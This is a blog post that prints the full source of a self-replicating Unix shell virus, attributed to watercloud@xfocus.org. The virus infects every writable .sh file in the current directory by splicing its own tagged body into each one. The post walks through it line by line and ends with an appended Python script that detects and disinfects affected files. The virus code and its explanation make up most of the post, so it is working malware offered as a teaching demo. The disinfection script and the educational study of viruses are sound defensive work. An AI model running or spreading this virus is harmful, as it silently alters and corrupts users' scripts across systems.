Wednesday, January 23, 2013

About UNIX SHELL Virus in backtrack


UNIX SHELL Virus
This program is of little practical use, but it is helpful for understanding the mechanism by which a virus spreads, since you can read the whole thing. Its instructional value therefore matters more than its practical value.

The program follows:


Code:
#!/bin/sh
#file name: h3ll0s_demo.sh
#purpose: shell virus demonstration
# note: the virus will infect all the files ending in .sh in the current
#       directory, but it will not infect them repeatedly.
#author: watercloud@xfocus.org

#date: 13-12-2011
#B:<+!a%C&t:>
vFile=$_ ; vTmp=/tmp/.vTmp.$$
for f in ./*.sh; do
if [ ! -w $f -a ! -r $vFile ]; then continue; fi
if grep '<+!a%C&t:>' $f ; then continue; fi
if sed -n '1p' $f | grep 'csh'; then continue; fi
cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
sed -n "1,${vNo}p" $vTmp >$f
(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
vNo=`expr $vNo + 1`
sed -n "${vNo},\$p" $vTmp >>$f
rm -f $vTmp
done >/dev/null 2>&1
unset vTmp ;unset vFile ;unset vNo
echo "Demo shell virus script !"
#E:<+!a%C&t:>
#EOF

Keep the format Unixvirus.sh

Explanation:

#B:<+!a%C&t:>
Start tag of the virus body, so the program can locate itself when copying.

vFile=$_ ; vTmp=/tmp/.vTmp.$$
Defines two variables: one is a temporary file, the other takes the program's file name from $_. This line therefore has to be the first effective (non-comment) line of the program; otherwise it cannot obtain the name of the running program and so cannot find the virus body to copy. (This relies on the shell setting $_ to the script path at startup, as bash does; not every shell guarantees it.)

for f in ./*.sh; do
Start of the loop over every program ending in .sh in the current directory.

if [ ! -w $f -a ! -r $vFile ]; then continue; fi
Proceed only if the target is writable and the virus source file is readable. (Note that the two tests are joined with -a, so as written the line only skips a target when both checks fail.)

if grep '<+!a%C&t:>' $f ; then continue; fi
Skip the target if it has already been infected; there is no point infecting it twice.

if sed -n '1p' $f | grep 'csh'; then continue; fi
Skip the target if it is a csh script; the syntax is too different.

cp -f $f $vTmp ;if [ $? -ne 0 ];then continue; fi
Prepare for the infection: first back the target up to the temporary file. If the copy fails, there is nothing to do but give up.

vNo=`awk '$0~/(^\b*#)|(^\b*$)/&&v==NR-1{v++}END{print 0+v}' $vTmp`
An awk regular expression to determine the entry point: it counts how many consecutive comment and blank lines there are at the start of the program, which gives the position at which the virus body is injected.

sed -n "1,${vNo}p" $vTmp >$f
The first sed copies the leading comment lines of the target file back from the backup.

(sed -n '/^#B:<+!a%C&t:>/,/^#E:<+!a%C&t:>/p' $vFile ;echo ) >>$f
A second sed transplants the virus body (the echo adds a blank line after it).

vNo=`expr $vNo + 1`
sed -n "${vNo},\$p" $vTmp >>$f
The last sed copies the rest of the target file back after the body. sed is powerful!

rm -f $vTmp
Clean up the temporary file.

done >/dev/null 2>&1
End of the loop; all output from the loop is discarded.

unset vTmp ;unset vFile ;unset vNo
Clean up the scene.

echo "Demo shell virus script !"
Since the file has been infected, print something to show that this is an infected file.

#E:<+!a%C&t:>
End tag of the virus body, so the program knows where its own copy stops.
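As an added defensive example (not part of the original post), the following Python script finds .sh files carrying the body tag and strips the injected #B:/#E: block plus the blank line the echo adds, restoring the original script. It assumes the marker and layout exactly as in the demo above; the sample scripts CLEAN and INFECTED are constructed.

```python
"""Constructed defensive example: detect and disinfect scripts touched by the demo."""
from pathlib import Path

MARKER = "<+!a%C&t:>"      # signature the demo greps for before infecting
BEGIN = "#B:" + MARKER     # first line of the injected body
END = "#E:" + MARKER       # last line of the injected body


def is_marked(text: str) -> bool:
    """True if the script carries the body tag (the same test the demo itself uses)."""
    return MARKER in text


def leading_header_lines(lines) -> int:
    """Count the run of comment/blank lines at the top of a script.
    This is the position the demo's awk expression computes for the injection."""
    n = 0
    for line in lines:
        if line.strip() == "" or line.lstrip().startswith("#"):
            n += 1
        else:
            break
    return n


def disinfect(text: str) -> str:
    """Remove the #B: ... #E: block and the empty line the demo echoes after it.
    Returns the text unchanged if no complete block is present."""
    lines = text.split("\n")
    try:
        b = lines.index(BEGIN)
        e = lines.index(END, b)
    except ValueError:
        return text
    # the demo appends the output of a bare `echo`, i.e. one empty line, after #E:
    if e + 1 < len(lines) and lines[e + 1] == "":
        e += 1
    return "\n".join(lines[:b] + lines[e + 1:])


def scan_directory(directory) -> list:
    """Return the .sh files directly under `directory` that carry the marker."""
    return sorted(p for p in Path(directory).glob("*.sh")
                  if is_marked(p.read_text(errors="replace")))


# Constructed samples: a clean two-line script and what the demo turns it into
CLEAN = "#!/bin/sh\n# hello\necho hi\n"
INFECTED = "#!/bin/sh\n# hello\n" + BEGIN + "\nvFile=$_\n" + END + "\n\necho hi\n"
```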

